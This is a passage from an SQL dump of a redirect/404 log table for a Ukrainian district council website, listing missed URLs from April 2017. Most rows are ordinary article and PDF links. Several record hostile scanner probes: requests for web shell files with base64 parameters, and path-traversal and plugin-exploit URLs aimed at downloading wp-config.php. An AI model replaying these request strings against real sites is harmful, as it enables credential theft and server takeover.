09:51:18','0000-00-00 00:00:00',301),(29971,'http://www.malyn-rayrada.gov.ua/get.php',NULL,'http://www.malyn-rayrada.gov.ua/get.php','',1,0,'2017-04-01 18:25:32','0000-00-00 00:00:00',301),(29972,'http://www.malyn-rayrada.gov.ua/attachments/article/1691/підсумки+відкритого+голосування1.pdf',NULL,'','',1,0,'2017-04-01 19:03:37','0000-00-00 00:00:00',301),(29973,'http://malyn-rayrada.gov.ua/get.php',NULL,'http://malyn-rayrada.gov.ua/get.php','',2,0,'2017-04-02 08:02:35','0000-00-00 00:00:00',301),(29974,'http://malyn-rayrada.gov.ua/e9be0fdf-9cd2-4b52-9e02-87f908a0e1bb',NULL,'','',1,0,'2017-04-03 00:26:56','0000-00-00 00:00:00',301),(29975,'http://www.malyn-rayrada.gov.ua/modules/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/modules/logo_img.php','',3,0,'2017-04-03 08:40:28','0000-00-00 00:00:00',301),(29976,'http://malyn-rayrada.gov.ua/modules/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/modules/logo_img.php','',2,0,'2017-04-03 11:30:24','0000-00-00 00:00:00',301),(29977,'http://www.malyn-rayrada.gov.ua/plugins/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/plugins/logo_img.php','',2,0,'2017-04-03 18:25:07','0000-00-00 00:00:00',301),(29978,'http://malyn-rayrada.gov.ua/components/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/components/logo_img.php','',5,0,'2017-04-03 21:35:22','0000-00-00 00:00:00',301),(29979,'http://malyn-rayrada.gov.ua/plugins/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/plugins/logo_img.php','',2,0,'2017-04-03 21:35:23','0000-00-00 00:00:00',301),(29980,'http://www.malyn-rayrada.gov.ua/templates/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/templates/logo_img.php','',2,0,'2017-04-05 05:54:20','0000-00-00 00:00:00',301),(29981,'http://malyn-rayrada.gov.ua/templates/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/templates/logo_img.php','',1,0,'2017-04-05 08:47:39','0000-00-00 00:00:00',301),(29982,'http://www.malyn-rayrada.gov.ua/tmp/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/tmp/logo_img.php','',1,0,'2017-04-05 17:22:17','0000-00-00 00:00:00',301),(29983,'http://malyn-rayrada.gov.ua/logs/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/logs/logo_img.php','',3,0,'2017-04-05 19:51:24','0000-00-00 00:00:00',301),(29984,'http://malyn-rayrada.gov.ua/tmp/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/tmp/logo_img.php','',3,0,'2017-04-05 20:08:41','0000-00-00 00:00:00',301),(29985,'http://malyn-rayrada.gov.ua/index.php/1693-pro-sklikannya-16-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-07 03:07:12','0000-00-00 00:00:00',301),(29986,'http://www.malyn-rayrada.gov.ua/attachments/article/1709/ріш змін Прог пож безп.pdf',NULL,'','',2,0,'2017-04-07 06:38:55','0000-00-00 00:00:00',301),(29987,'http://www.malyn-rayrada.gov.ua/attachments/article/1709/ріш+змін+Прог+пож+безп.pdf',NULL,'','',1,0,'2017-04-08 01:40:55','0000-00-00 00:00:00',301),(29988,'http://malyn-rayrada.gov.ua/attachments/article/1696/протокол н1.pdf',NULL,'','',2,0,'2017-04-08 16:31:02','0000-00-00 00:00:00',301),(29989,'http://malyn-rayrada.gov.ua/attachments/article/1696/протокол н2.pdf',NULL,'','',2,0,'2017-04-08 17:20:29','0000-00-00 00:00:00',301),(29990,'http://malyn-rayrada.gov.ua/images/1ndex.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:29:50','0000-00-00 00:00:00',301),(29991,'http://malyn-rayrada.gov.ua/sqlbak.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:30:08','0000-00-00 00:00:00',301),(29992,'http://malyn-rayrada.gov.ua/email.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:30:29','0000-00-00 00:00:00',301),(29993,'http://malyn-rayrada.gov.ua/functions.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:30:59','0000-00-00 00:00:00',301),(29994,'http://malyn-rayrada.gov.ua/cache/news.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:31:51','0000-00-00 00:00:00',301),(29995,'http://malyn-rayrada.gov.ua/tmp.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',4,0,'2017-04-09 00:32:13','0000-00-00 00:00:00',301),(29996,'http://malyn-rayrada.gov.ua/configurationbak.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:33:02','0000-00-00 00:00:00',301),(29997,'http://malyn-rayrada.gov.ua/robots.txt.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:33:35','0000-00-00 00:00:00',301),(29998,'http://malyn-rayrada.gov.ua/jconfig.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:34:05','0000-00-00 00:00:00',301),(29999,'http://malyn-rayrada.gov.ua/media/reads.php?z3=b2RaMWRqLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:34:25','0000-00-00 00:00:00',301),(30000,'http://malyn-rayrada.gov.ua/media/1ndex.php?z3=b2RaMWRqLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:34:58','0000-00-00 00:00:00',301),(30001,'http://malyn-rayrada.gov.ua/sql_dump.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:35:19','0000-00-00 00:00:00',301),(30002,'http://malyn-rayrada.gov.ua/images/laj.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:35:33','0000-00-00 00:00:00',301),(30003,'http://malyn-rayrada.gov.ua/media/404.php?z3=b2RaMWRqLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:36:38','0000-00-00 00:00:00',301),(30004,'http://malyn-rayrada.gov.ua/media/tmp.php?z3=b2RaMWRqLnBocA==&z4=L21lZGlhLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:37:05','0000-00-00 00:00:00',301),(30005,'http://malyn-rayrada.gov.ua/r3x.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:37:34','0000-00-00 00:00:00',301),(30006,'http://malyn-rayrada.gov.ua/images/stories/0day.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:38:42','0000-00-00 00:00:00',301),(30007,'http://malyn-rayrada.gov.ua/includes/u2p.php?z3=b2RaMWRqLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:39:09','0000-00-00 00:00:00',301),(30008,'http://malyn-rayrada.gov.ua/images/xxx.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:39:44','0000-00-00 00:00:00',301),(30009,'http://malyn-rayrada.gov.ua/al277.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:40:10','0000-00-00 00:00:00',301),(30010,'http://malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:40:39','0000-00-00 00:00:00',301),(30011,'http://malyn-rayrada.gov.ua/install.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:41:09','0000-00-00 00:00:00',301),(30012,'http://malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=b2RaMWRqLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:41:33','0000-00-00 00:00:00',301),(30013,'http://malyn-rayrada.gov.ua/robot.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:42:01','0000-00-00 00:00:00',301),(30014,'http://malyn-rayrada.gov.ua/wsdl.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:42:32','0000-00-00 00:00:00',301),(30015,'http://malyn-rayrada.gov.ua/goog1es.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:43:08','0000-00-00 00:00:00',301),(30016,'http://malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=b2RaMWRqLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:43:36','0000-00-00 00:00:00',301),(30017,'http://malyn-rayrada.gov.ua/includes.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:44:15','0000-00-00 00:00:00',301),(30018,'http://malyn-rayrada.gov.ua/wp-main.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:44:43','0000-00-00 00:00:00',301),(30019,'http://malyn-rayrada.gov.ua/images/al277.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:45:32','0000-00-00 00:00:00',301),(30020,'http://malyn-rayrada.gov.ua/webconfig.txt.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:46:01','0000-00-00 00:00:00',301),(30021,'http://malyn-rayrada.gov.ua/cache/cachee.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:46:28','0000-00-00 00:00:00',301),(30022,'http://malyn-rayrada.gov.ua/thumb.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:47:03','0000-00-00 00:00:00',301),(30023,'http://malyn-rayrada.gov.ua/SessionController.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:47:51','0000-00-00 00:00:00',301),(30024,'http://malyn-rayrada.gov.ua/maill.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:48:27','0000-00-00 00:00:00',301),(30025,'http://malyn-rayrada.gov.ua/error-log.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:49:23','0000-00-00 00:00:00',301),(30026,'http://malyn-rayrada.gov.ua/authenticating.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:49:54','0000-00-00 00:00:00',301),(30027,'http://malyn-rayrada.gov.ua/google-assist.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:50:15','0000-00-00 00:00:00',301),(30028,'http://malyn-rayrada.gov.ua/images/google-assist.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:50:40','0000-00-00 00:00:00',301),(30029,'http://malyn-rayrada.gov.ua/images/robots.txt.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:51:00','0000-00-00 00:00:00',301),(30030,'http://malyn-rayrada.gov.ua/elements.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:51:27','0000-00-00 00:00:00',301),(30031,'http://malyn-rayrada.gov.ua/xmlsrpc.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:52:01','0000-00-00 00:00:00',301),(30032,'http://malyn-rayrada.gov.ua/wp-cache.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:52:21','0000-00-00 00:00:00',301),(30033,'http://malyn-rayrada.gov.ua/images/404.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:52:43','0000-00-00 00:00:00',301),(30034,'http://malyn-rayrada.gov.ua/images/head.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:53:21','0000-00-00 00:00:00',301),(30035,'http://malyn-rayrada.gov.ua/cache/support.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:53:39','0000-00-00 00:00:00',301),(30036,'http://malyn-rayrada.gov.ua/RoseLeif.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:54:14','0000-00-00 00:00:00',301),(30037,'http://malyn-rayrada.gov.ua/Abbrevsprl.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:54:21','0000-00-00 00:00:00',301),(30038,'http://malyn-rayrada.gov.ua/show.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:54:49','0000-00-00 00:00:00',301),(30039,'http://malyn-rayrada.gov.ua/images/defau1t.php?z3=b2RaMWRqLnBocA==&z4=L2ltYWdlcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:55:30','0000-00-00 00:00:00',301),(30040,'http://malyn-rayrada.gov.ua/cli/40dd1d.php?z3=b2RaMWRqLnBocA==&z4=L2NsaS8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:56:05','0000-00-00 00:00:00',301),(30041,'http://malyn-rayrada.gov.ua/infos.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:56:25','0000-00-00 00:00:00',301),(30042,'http://malyn-rayrada.gov.ua/cache/defau1t.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:56:35','0000-00-00 00:00:00',301),(30043,'http://malyn-rayrada.gov.ua/bookmark.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:57:01','0000-00-00 00:00:00',301),(30044,'http://malyn-rayrada.gov.ua/configbak.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:57:34','0000-00-00 00:00:00',301),(30045,'http://malyn-rayrada.gov.ua/wp-data.php?z3=b2RaMWRqLnBocA==&z4=Lw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:58:09','0000-00-00 00:00:00',301),(30046,'http://malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:58:32','0000-00-00 00:00:00',301),(30047,'http://malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:58:49','0000-00-00 00:00:00',301),(30048,'http://malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:59:26','0000-00-00 00:00:00',301),(30049,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 00:59:53','0000-00-00 00:00:00',301),(30050,'http://malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:00:23','0000-00-00 00:00:00',301),(30051,'http://malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:00:28','0000-00-00 00:00:00',301),(30052,'http://malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:00:52','0000-00-00 00:00:00',301),(30053,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:01:23','0000-00-00 00:00:00',301),(30054,'http://malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:01:39','0000-00-00 00:00:00',301),(30055,'http://malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=b2RaMWRqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:02:27','0000-00-00 00:00:00',301),(30056,'http://malyn-rayrada.gov.ua/cache/list.php?z3=b2RaMWRqLnBocA==&z4=L2NhY2hlLw==',NULL,'malyn-rayrada.gov.ua','',2,0,'2017-04-09 01:03:00','0000-00-00 00:00:00',301),(30057,'http://malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/odZ1dj.php',NULL,'','',1,0,'2017-04-09 01:10:03','0000-00-00 00:00:00',301),(30058,'http://malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/odZ1dj.php',NULL,'','',1,0,'2017-04-09 01:10:08','0000-00-00 00:00:00',301),(30059,'http://malyn-rayrada.gov.ua/wp-content/uploads/odZ1dj.php',NULL,'','',1,0,'2017-04-09 01:10:24','0000-00-00 00:00:00',301),(30060,'http://malyn-rayrada.gov.ua/odZ1dj.php',NULL,'','',1,0,'2017-04-09 01:10:35','0000-00-00 00:00:00',301),(30061,'http://malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/odZ1dj.php',NULL,'','',1,0,'2017-04-09 01:10:47','0000-00-00 00:00:00',301),(30062,'http://malyn-rayrada.gov.ua/index.php/1693-pro-sklikannya-16-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',38,0,'2017-04-09 14:36:10','0000-00-00 00:00:00',301),(30063,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Login-wall-OaWAc/login_wall.php?login=cmd',NULL,'','',1,0,'2017-04-09 22:11:01','0000-00-00 00:00:00',301),(30064,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/revslider/db.php',NULL,'','',1,0,'2017-04-09 22:11:01','0000-00-00 00:00:00',301),(30065,'http://www.malyn-rayrada.gov.ua/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php',NULL,'','',1,0,'2017-04-09 22:11:02','0000-00-00 00:00:00',301),(30066,'http://www.malyn-rayrada.gov.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2017-04-09 22:11:02','0000-00-00 00:00:00',301),(30067,'http://www.malyn-rayrada.gov.ua/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php',NULL,'','',1,0,'2017-04-09 22:11:02','0000-00-00 00:00:00',301),(30068,'http://www.malyn-rayrada.gov.ua/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes',NULL,'','',1,0,'2017-04-09 22:11:02','0000-00-00 00:00:00',301),(30069,'http://www.malyn-rayrada.gov.ua/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php',NULL,'','',1,0,'2017-04-09 22:11:03','0000-00-00 00:00:00',301),(30070,'http://malyn-rayrada.gov.ua/attachments/article/1506/ÐŸÑ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого поіменного Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ  8 Ñ ÐµÑ Ñ–Ñ .pdf',NULL,'','',2,0,'2017-04-11 06:46:41','0000-00-00 00:00:00',301),(30071,'http://malyn-rayrada.gov.ua//sinoptik.ua/informers_js.php?title=3&wind=1&cities=303015024&lang=ua',NULL,'','',19,0,'2017-04-12 08:43:41','0000-00-00 00:00:00',301),(30072,'http://malyn-rayrada.gov.ua/index.php/1469-komunalne-pidpriemstvo-malinska-rajonna-drukarnya-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',31,0,'2017-04-14 10:44:28','0000-00-00 00:00:00',301),(30073,'http://www.malyn-rayrada.gov.ua/index.php/1515-informatsiya-shchodo-roboti-kabelnogo-telebachennya-v-mikrorajoni-paperovoji-fabriki',NULL,'','',44,0,'2017-04-14 11:15:37','0000-00-00 00:00:00',301),(30074,'http://malyn-rayrada.gov.ua/index.php/1513-ksaverivska-silska-rada-informue-shchodo-proektiv-regulyatornikh-aktiv',NULL,'','',37,0,'2017-04-14 12:15:09','0000-00-00 00:00:00',301),(30075,'http://malyn-rayrada.gov.ua/index.php/1511-gorinska-silska-rada-informue-shchodo-zatverdzhennya-podatkiv-i-zboriv',NULL,'','',30,0,'2017-04-14 12:33:43','0000-00-00 00:00:00',301),(30076,'http://malyn-rayrada.gov.ua/index.php/1534-pro-sklikannya-10-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',24,0,'2017-04-14 15:44:55','0000-00-00 00:00:00',301),(30077,'http://malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',31,0,'2017-04-14 16:37:04','0000-00-00 00:00:00',301),(30078,'http://malyn-rayrada.gov.ua/index.php/1533-ogoloshennya-pro-shchodo-orendi-komunalnogo-majna',NULL,'','',43,0,'2017-04-14 19:13:51','0000-00-00 00:00:00',301),(30079,'http://www.malyn-rayrada.gov.ua/index.php/1503-malinski-podatkivtsi-informuyut',NULL,'','',19,0,'2017-04-14 21:26:42','0000-00-00 00:00:00',301),(30080,'http://malyn-rayrada.gov.ua/index.php/1471-sektor-organizatsijnoji-roboti-malinskoji-odpi-informue',NULL,'','',58,0,'2017-04-14 23:49:59','0000-00-00 00:00:00',301),(30081,'http://malyn-rayrada.gov.ua/index.php/1518-ksaverivska-silska-rada-informue?tmpl=component&print=1&layout=default&page=',NULL,'','',2,0,'2017-04-15 00:53:12','0000-00-00 00:00:00',301),(30082,'http://malyn-rayrada.gov.ua/index.php/1515-informatsiya-shchodo-roboti-kabelnogo-telebachennya-v-mikrorajoni-paperovoji-fabriki?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-15 04:24:56','0000-00-00 00:00:00',301),(30083,'http://www.malyn-rayrada.gov.ua/index.php/1582-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu',NULL,'','',34,0,'2017-04-15 04:29:13','0000-00-00 00:00:00',301),(30084,'http://malyn-rayrada.gov.ua/index.php/1476-vitaemo-iz-svyatom-3',NULL,'','',45,0,'2017-04-15 05:00:02','0000-00-00 00:00:00',301),(30085,'http://malyn-rayrada.gov.ua/attachments/article/1702/результати 22032017.pdf',NULL,'','',2,0,'2017-04-15 05:57:33','0000-00-00 00:00:00',301),(30086,'http://malyn-rayrada.gov.ua/index.php/1503-malinski-podatkivtsi-informuyut',NULL,'','',29,0,'2017-04-15 07:38:36','0000-00-00 00:00:00',301),(30087,'http://www.malyn-rayrada.gov.ua/index.php/1363-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2017',NULL,'','',26,0,'2017-04-15 08:17:33','0000-00-00 00:00:00',301),(30088,'http://www.malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-15 10:38:10','0000-00-00 00:00:00',301),(30089,'http://www.malyn-rayrada.gov.ua/index.php/1518-ksaverivska-silska-rada-informue',NULL,'','',30,0,'2017-04-15 12:36:23','0000-00-00 00:00:00',301),(30090,'http://malyn-rayrada.gov.ua/index.php/1464-rozpochato-viplatu-pensij-za-cherven',NULL,'','',38,0,'2017-04-15 14:08:14','0000-00-00 00:00:00',301),(30091,'http://www.malyn-rayrada.gov.ua/index.php/1467-teritorialnij-tsentr-sotsialnogo-obslugovuvannya-nadannya-sotsialnikh-poslug-malinskogo-rajonu-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',33,0,'2017-04-15 14:51:51','0000-00-00 00:00:00',301),(30092,'http://malyn-rayrada.gov.ua/index.php/1371-kajdasheva-sim-ya-u-vikonanni-artistiv-chopovitskoji-gromadi',NULL,'','',26,0,'2017-04-16 01:40:44','0000-00-00 00:00:00',301),(30093,'http://malyn-rayrada.gov.ua/index.php/1331-vitaemo-iz-novim-2016-rokom',NULL,'','',33,0,'2017-04-16 02:22:41','0000-00-00 00:00:00',301),(30094,'http://www.malyn-rayrada.gov.ua/index.php/1511-gorinska-silska-rada-informue-shchodo-zatverdzhennya-podatkiv-i-zboriv',NULL,'','',26,0,'2017-04-16 12:10:58','0000-00-00 00:00:00',301),(30095,'http://www.malyn-rayrada.gov.ua/index.php/1447-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu',NULL,'','',25,0,'2017-04-16 12:56:07','0000-00-00 00:00:00',301),(30096,'http://malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-16 14:07:22','0000-00-00 00:00:00',301),(30097,'http://malyn-rayrada.gov.ua/index.php/1582-ogoloshennya-pro-provedennya-konkursu-na-pravo-orendi-majna-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-malinskogo-rajonu',NULL,'','',31,0,'2017-04-17 01:04:47','0000-00-00 00:00:00',301),(30098,'http://malyn-rayrada.gov.ua/index.php/1447-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu',NULL,'','',30,0,'2017-04-17 03:07:04','0000-00-00 00:00:00',301),(30099,'http://malyn-rayrada.gov.ua/index.php/1363-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2017',NULL,'','',25,0,'2017-04-17 03:12:38','0000-00-00 00:00:00',301),(30100,'http://www.malyn-rayrada.gov.ua/index.php/1469-komunalne-pidpriemstvo-malinska-rajonna-drukarnya-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu',NULL,'','',31,0,'2017-04-17 04:40:09','0000-00-00 00:00:00',301),(30101,'http://www.malyn-rayrada.gov.ua/index.php/1476-vitaemo-iz-svyatom-3',NULL,'','',27,0,'2017-04-17 05:16:18','0000-00-00 00:00:00',301),(30102,'http://www.malyn-rayrada.gov.ua/index.php/1513-ksaverivska-silska-rada-informue-shchodo-proektiv-regulyatornikh-aktiv',NULL,'','',25,0,'2017-04-17 09:17:55','0000-00-00 00:00:00',301),(30103,'http://www.malyn-rayrada.gov.ua/index.php/1129-z-dnem-konstitutsiji-ukrajini?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2017-04-17 17:55:45','0000-00-00 